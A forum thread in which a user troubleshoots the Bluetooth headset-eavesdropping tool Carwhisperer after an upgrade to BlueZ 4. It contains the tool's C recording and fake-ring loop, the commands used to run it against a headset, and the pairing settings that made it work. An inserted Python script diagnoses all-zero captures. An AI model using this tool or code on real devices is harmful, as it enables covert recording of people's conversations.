
Thread: [NOT WORKING] Carwhisperer

  1. #1
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default [NOT WORKING] Carwhisperer

    In BT4, because of the new Bluetooth stack (bluez 4 instead of bluez 3.x), the tool carwhisperer doesn't work anymore.

    It is possible to start it, it will connect to the headset (if default PIN was set correctly), but it doesn't record anything (it fills up the output file with zeros).

    Maybe I screwed up something with the settings (however this is highly unlikely), but you know too that bluez 4 has no documentation at all, so figuring out how to change settings is really difficult.
    I would highly recommend (if the newer kernel still makes this possible) to return to bluez 3.x.

    Thank you,
    DOMy
    127.0.0.1 sweety 127.0.0.1???


    Home, sweety home

    -by HK!

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: [NOT WORKING] Carwhisperer

    Could you post the commands you used and their output to include error messages?
    Maybe we can either help or get it fixed.
    Thanks.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Junior Member
    Join Date
    May 2007
    Posts
    38


    Quote Originally Posted by Archangel-Amael:
    Could you post the commands you used and their output to include error messages?
    Maybe we can either help or get it fixed.
    Thanks.
    Well, it is pretty easy: setting up the default passkey is not possible (hcid.conf is missing); this could be fixed by using some Python script I found on the net. After that, it is able to connect to the BT headset (no more "Access denied" message), but recording doesn't work; all we get is noise (after SOX postprocessing).
    I will look into the source code sometime, but maybe you can find out why this happens.

    EDIT2:
    Howto Install Carwhisperer on Ubuntu 9.10

    This might help, I will test it ASAP; if it works, then please include the simple-agent and a short README file in the next Backtrack.


    EDIT3-final:
    Well, I checked some stuff, and now I am able to connect to the headset, but all we get as replies are zeros; hcidump shows nicely that all the incoming packets contain only zeros, not valid data.
    I tried to send out a test file and see if it gets played back on the headset, but no luck with that either. It seems that somehow, between the stack and the actual hardware, some stuff simply disappears or gets cut out, or I don't know.

    To be short and simple: this part of the carwhisperer code fails with bluez-4 but it does work with bluez-3 (tested):

    Code:
        // turn up the speaker volume and the microphone gain to the highest level
        wlen = write(rd, "AT+VGS=15\r\n", 11);
        wlen = write(rd, "AT+VGM=15\r\n", 11);

        // send 'RING' message in order to initiate fake phone call
        wlen = write(rd, "RING\r\n", 6);

        maxfd = (rd > sd) ? rd : sd;

        while (!terminate) {

            FD_ZERO(&rfds);
            FD_SET(rd, &rfds);
            FD_SET(sd, &rfds);

            timeout.tv_sec = 2;
            timeout.tv_usec = 0;

            if ((sel = select(maxfd + 1, &rfds, NULL, NULL, &timeout)) > 0) {

                // RFCOMM control channel: answer the headset's AT commands, but only
                // once the SCO audio channel has delivered its first packet
                if ((FD_ISSET(rd, &rfds)) && (scostarted != 0)) {
                    memset(buf, 0, sizeof(buf));
                    rlen = read(rd, buf, sizeof(buf));
                    if (rlen > 0) {
                        fprintf(stderr, "got:  %s\n", buf);
                        if (strncmp(buf, "AT+BRSF=", 8) == 0) {
                            // supported-features exchange
                            wlen = write(rd, "+BRSF: 63\r\n", 11);
                            fprintf(stderr, "answered:  +BRSF: 63\n");
                        } else if (strncmp(buf, "AT+CIND?", 8) == 0) {
                            // current indicator values
                            wlen = write(rd, "+CIND: 0,1,0,0\r\n", 16);
                            fprintf(stderr, "answered:  +CIND: 0,1,0,0\n");
                        } else if (strncmp(buf, "AT+CIND=?", 9) == 0) {
                            // supported indicators and their value ranges
                            wlen = write(rd, "+CIND: (\"call\",(0,1)),(\"service\",(0,1)),(\"call_setup\",(0-3)),(\"callsetup\",(0-3))\r\n", 82);
                            fprintf(stderr, "answered:  +CIND: (\"call\",(0,1)),(\"service\",(0,1)),(\"call_setup\",(0-3)),(\"callsetup\",(0-3))\n");
                        } else {
                            // answer to anything else with an 'OK'
                            wlen = write(rd, "OK\r\n", 4);
                            fprintf(stderr, "answered:  OK\n");
                        }
                    } else {
                        // check return value of read call
                        if (rlen == -1) {
                            // terminate loop
                            wlen = write(rd, "AT+VGM=15\r\n", 11);
                            terminate = 1;
                        }
                    }
                }

                // SCO audio channel: store what the headset sends, then feed it the
                // next chunk of the outgoing audio file in MTU-sized writes
                if (FD_ISSET(sd, &rfds)) {
                    scostarted = 1;
                    memset(buf, 0, sizeof(buf));
                    rlen = read(sd, buf, sizeof(buf));
                    if (rlen > 0) {
                        wlen = write(fdo, buf, rlen);
                        rlen = read(fdi, buf, rlen);
                        wlen = 0;
                        // only forward if the input file actually returned data;
                        // a 0 or -1 here must not be handed to write() as a length
                        if (rlen > 0) {
                            p = buf;
                            while (rlen > sco_mtu) {
                                wlen += write(sd, p, sco_mtu);
                                rlen -= sco_mtu;
                                p += sco_mtu;
                            }
                            wlen += write(sd, p, rlen);
                        }
                    }
                }
                if (cnt++ > 800) {

                    // periodically repeat the RING and keep the speaker volume
                    // and microphone gain at maximum
                    wlen = write(rd, "RING\r\n", 6);
                    wlen = write(rd, "AT+VGS=15\r\n", 11);
                    wlen = write(rd, "AT+VGM=15\r\n", 11);
                    cnt = 0;
                    printf(".\n");
                }
            }
        }

        // close sockets
        close(sd);
        close(rd);

        // close files
        close(fdi);
        close(fdo);

        return 0;
    }
    Thanks,
    DOMy
    Last edited by domi007; 10-10-2010 at 08:58 PM.

  4. #4
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default Re: [NOT WORKING] Carwhisperer

    BUMP, no one does any Bluetooth hacking here? Please, someone?

  5. #5
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: [NOT WORKING] Carwhisperer

    Quote Originally Posted by domi007:
    BUMP, no one does any Bluetooth hacking here? Please, someone?
    Don't do that. Ever.

    You didn't provide all of what Amael asked for, we see no output to commands. Try complying with a request so that we can help you.

    Without any assistance from you, that big chunk of select code is useless to us. I can't say if it's a service= issue or a service issue, or whether or not the software is even associating correctly or just bailing down to saving blanks.

    Again, help us to help you.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  6. #6
    Junior Member
    Join Date
    May 2007
    Posts
    38


    Quote Originally Posted by Gitsnik:
    Don't do that. Ever.

    You didn't provide all of what Amael asked for, we see no output to commands. Try complying with a request so that we can help you.

    Without any assistance from you, that big chunk of select code is useless to us. I can't say if it's a service= issue or a service issue, or whether or not the software is even associating correctly or just bailing down to saving blanks.

    Again, help us to help you.
    Okay, you are right, here are my steps:

    hciconfig hci0 up
    hciconfig
    (shows my BT dongle is up and running)
    hcitool scan
    (got my headset's BD address)

    /etc/init.d/bluetooth restart
    Stopping bluetoothd
    Starting bluetoothd

    #Following the instructions found on Howto Install Carwhisperer on Ubuntu 9.10

    wget http://mediakey.dk/~cc/files/simple-agent
    # Kill the existing passkey agent
    pkill -9 bluetooth-applet
    chmod +x simple-agent
    ./simple-agent
    Agent is running

    Opening a new shell tab:
    cd /pentest/bluetooth/carwhisperer
    ./carwhisperer hci0 message.raw out.raw <my headset's bd-address> 2
    (message.raw is an empty file, which I made using nano)
    Voice setting: 0x0060
    RFCOMM channel connected
    SCO audio channel connected (handle 45, mtu 64)

    The out.raw file contains only zeros. Also note that when carwhisperer sniffs real data it prints a dot and a newline character on the screen, like this:
    Voice setting: 0x0060
    RFCOMM channel connected
    SCO audio channel connected (handle 45, mtu 64)
    .
    .
    .
    .

    Under bt3 and bluez3 it did work perfectly. All I had to do was change some settings in the hcid.conf and restart the hci daemon. The changes I made were: auto authentication (or security mode or whatever it's called), pin 0000, lm mode MASTER, ACCEPT, class 0x050204 (phone).

    I am currently trying to change the class and the LM mode with hcitool, so far no success.


    mod: Finally changed the class and the lm mode, same result: only zeros in the output file.


    Thanks for your help,
    appreciate it a lot,
    DOMy

    I looked into things with hcidump and it seems that the headset is sending only zeroes. I don't know why; maybe it is a low-level problem directly related to the BT stack.
    Will continue researching the issue, but I need some other people too, so please help me.

    DOMy
    Last edited by Archangel-Amael; 10-14-2010 at 07:20 PM.
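The symptom reported above (an out.raw that is nothing but zeros, versus the noise seen earlier after SOX post-processing) is easy to misjudge by eye in a hex dump. The following is an added diagnostic script, not part of carwhisperer or of this thread, that reads the raw capture and classifies it as empty, all-zero, near-silent or real audio. It assumes the capture is signed 16-bit little-endian mono PCM at 8 kHz, which is what "Voice setting: 0x0060" (16-bit linear input coding) and HSP/HFP SCO audio normally imply; the file name and the thresholds are assumptions, and the sample inputs are constructed.

```python
"""Classify a raw SCO capture: empty, all zeros, near-silent, or audio present."""
import math
import struct
import sys
from typing import Dict, Union

# Assumed capture format (not stated explicitly in the thread): the voice setting
# 0x0060 selects 16-bit linear PCM, and HSP/HFP SCO audio is 8 kHz mono.
SAMPLE_RATE = 8000
BYTES_PER_SAMPLE = 2

# Assumed thresholds: above this zero fraction the socket delivered nothing;
# below this RMS the link is up but carries no usable audio.
ALL_ZERO_FRACTION = 0.99
SILENCE_RMS = 50.0


def analyze_raw_sco(data: bytes, sample_rate: int = SAMPLE_RATE) -> Dict[str, Union[int, float, str]]:
    """Interpret data as signed 16-bit little-endian mono PCM and report what it looks like."""
    if len(data) % BYTES_PER_SAMPLE:
        data = data[:-1]  # a trailing odd byte is not a whole sample; ignore it
    n = len(data) // BYTES_PER_SAMPLE
    if n == 0:
        return {"samples": 0, "seconds": 0.0, "zero_fraction": 1.0, "rms": 0.0, "verdict": "empty file"}
    samples = struct.unpack("<%dh" % n, data)
    zero_fraction = sum(1 for s in samples if s == 0) / n
    rms = math.sqrt(sum(s * s for s in samples) / n)
    if zero_fraction > ALL_ZERO_FRACTION:
        verdict = "all zeros: nothing reached the SCO socket"
    elif rms < SILENCE_RMS:
        verdict = "near-silent: link is up but no usable audio is arriving"
    else:
        verdict = "audio present"
    return {
        "samples": n,
        "seconds": n / sample_rate,
        "zero_fraction": zero_fraction,
        "rms": rms,
        "verdict": verdict,
    }


def make_tone(freq_hz: float = 1000.0, seconds: float = 0.5, amplitude: int = 8000) -> bytes:
    """Constructed sample input: a sine tone encoded the way a good capture would be."""
    n = int(SAMPLE_RATE * seconds)
    samples = [int(round(amplitude * math.sin(2 * math.pi * freq_hz * k / SAMPLE_RATE))) for k in range(n)]
    return struct.pack("<%dh" % n, *samples)


def main(argv):
    if len(argv) > 1:
        with open(argv[1], "rb") as fh:  # e.g. the out.raw written by the tool
            data = fh.read()
    else:
        data = b"\x00" * 1280  # constructed: 80 ms of the all-zero output described above
    for key, value in analyze_raw_sco(data).items():
        print("%-14s %s" % (key, value))


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 sco_check.py out.raw` (script name assumed) against the capture; with no argument it analyzes a constructed all-zero buffer. An "all zeros" verdict means the SCO socket itself returned zero-filled packets, as the hcidump observation suggests, so the problem sits below the tool, in the stack or the controller, rather than in the AT-command dialogue.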

  7. #7
    Junior Member
    Join Date
    May 2007
    Posts
    38

    Default Re: [NOT WORKING] Carwhisperer

    Nobody?
    I guess then I will have to make my own distribution for hacking... well, whatever.
